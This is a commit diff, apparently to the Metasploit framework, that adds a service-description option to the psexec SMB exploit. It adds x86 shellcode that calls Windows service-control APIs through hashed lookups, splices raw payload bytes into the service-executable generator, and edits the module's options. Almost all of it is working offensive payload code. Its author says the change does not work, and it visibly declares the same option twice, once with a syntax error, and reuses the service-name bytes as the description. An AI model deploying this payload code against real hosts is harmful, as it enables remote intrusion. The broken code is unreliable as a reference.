Try to add SERVICE_DESCRIPTION options to psexec, but it doesn't seem to work...

Author: Florian Gaultier

external/source/shellcode/windows/x86/src/block/block_service_change_description.asm

@@ -0,0 +1,37 @@
+;-----------------------------------------------------------------------------;
+; Author: agix (florian.gaultier[at]gmail[dot]com)
+; Compatible: Windows 7, 2008, Vista, 2003, XP, 2000, NT4
+; Size: 448 bytes
+;-----------------------------------------------------------------------------;
+
+[BITS 32]
+; Input: EBP must be the address of 'api_call'.
+
+push 0x000F01FF
+push 0x00000000
+push 0x00000000
+push 0x7636F067
+call ebp 		;OpenSCManagerA
+mov edi, eax
+push 0x00464349
+push 0x56524553
+mov ecx, esp	;SVCNAME
+push 0x000F01FF
+push ecx
+push eax
+push 0x404B2856
+call ebp 		;OpenServiceA
+mov esi, eax
+push 0x00464349
+push 0x56524553
+mov ecx, esp	;SVCDESCRIPTION
+push 0x00000001 ;SERVICE_CONFIG_DESCRIPTION
+push eax
+push 0xED35B087
+call ebp 		;ChangeServiceConfig2A
+push esi
+push 0xAD77EADE	;CloseServiceHandle
+call ebp
+push edi
+push 0xAD77EADE	;CloseServiceHandle
+call ebp

external/source/shellcode/windows/x86/src/block/block_service_stopped.asm

@@ -7,8 +7,8 @@
 [BITS 32]
 ; Input: EBP must be the address of 'api_call'.
 
-call me2
-me2:
+call me3
+me3:
 pop edi
 jmp 0x7
 pop eax

external/source/shellcode/windows/x86/src/single/single_service_stuff.asm

@@ -14,6 +14,7 @@
 start:                   ;
   pop ebp                ; pop off the address of 'api_call' for calling later.
 %include "./src/block/block_service.asm"
+%include "./src/block/block_service_change_description.asm"
 %include "./src/block/block_create_remote_process.asm"
 %include "./src/block/block_service_stopped.asm"
 

lib/msf/util/exe.rb

@@ -539,6 +539,20 @@ def self.to_win32pe_service(framework, code, opts={})
         "\x00\x6A\x00\x6A\x00\x6A\x01\x6A\x10\x89\xE1\x6A\x00\x51\x50\x68" +
         "\xC6\x55\x37\x7D\xFF\xD5\x57\x68\xF0\xB5\xA2\x56\xFF\xD5"
 
+      code_service_description = ""
+
+      if opts[:servicedescription]
+        pushed_service_description = string_to_pushes(opts[:servicedescription])
+
+        code_service_description = 
+          "\x68\xFF\x01\x0F\x00\x6A\x00\x6A\x00\x68\x67\xF0\x36" +
+          "\x76\xFF\xD5\x89\xC7"+pushed_service_name+"\x89\xE1\x68" +
+          "\xFF\x01\x0F\x00\x51\x50\x68\x56\x28\x4B\x40\xFF\xD5\x89\xC6" +
+          pushed_service_description+"\x89\xE1\x6A\x01\x50\x68\x87\xB0\x35" +
+          "\xED\xFF\xD5\x56\x68\xDE\xEA\x77\xAD\xFF\xD5\x57\x68\xDE\xEA\x77" +
+          "\xAD\xFF\xD5"
+      end
+
       precode_size = 0x42
       shellcode_code_offset = code_service_stopped.length + precode_size
 
@@ -561,7 +575,8 @@ def self.to_win32pe_service(framework, code, opts={})
          [hash_code_offset].pack('<I')+pushed_service_name+"\x89\xE1\x8D" +
         "\x85"+[svcctrlhandler_code_offset].pack('<I')+"\x6A\x00\x50\x51\x68\x0B\xAA\x44\x52\xFF\xD5" +
         "\x6A\x00\x6A\x00\x6A\x00\x6A\x00\x6A\x00\x6A\x00\x6A\x04\x6A\x10" +
-        "\x89\xE1\x6A\x00\x51\x50\x68\xC6\x55\x37\x7D\xFF\xD5\x31\xFF\x6A" +
+        "\x89\xE1\x6A\x00\x51\x50\x68\xC6\x55\x37\x7D\xFF\xD5" +
+         code_service_description+"\x31\xFF\x6A" +
         "\x04\x68\x00\x10\x00\x00\x6A\x54\x57\x68\x58\xA4\x53\xE5\xFF\xD5" +
         "\xC7\x00\x44\x00\x00\x00\x8D\x70\x44\x57\x68\x2E\x65\x78\x65\x68" +
         "\x6C\x6C\x33\x32\x68\x72\x75\x6E\x64\x89\xE1\x56\x50\x57\x57\x6A" +

modules/exploits/windows/smb/psexec.rb

@@ -83,7 +83,8 @@ def initialize(info = {})
         OptString.new('SERVICE_FILENAME', [false, "Filename to to be used on target for the service binary",nil]),
         OptString.new('SERVICE_DESCRIPTION', [false, "Service description to to be used on target for pretty listing",nil])
         OptString.new('SERVICE_NAME', [false, "Servicename to to be used on target for the service binary and manager",nil]),
-        OptString.new('SERVICE_DISPLAYNAME', [false, "Service displayname to to be used on target for the service manager",nil])
+        OptString.new('SERVICE_DISPLAYNAME', [false, "Service displayname to to be used on target for the service manager",nil]),
+        OptString.new('SERVICE_DESCRIPTION', [false, "Service description to to be used on target for pretty listing",nil])
       ], self.class)
   end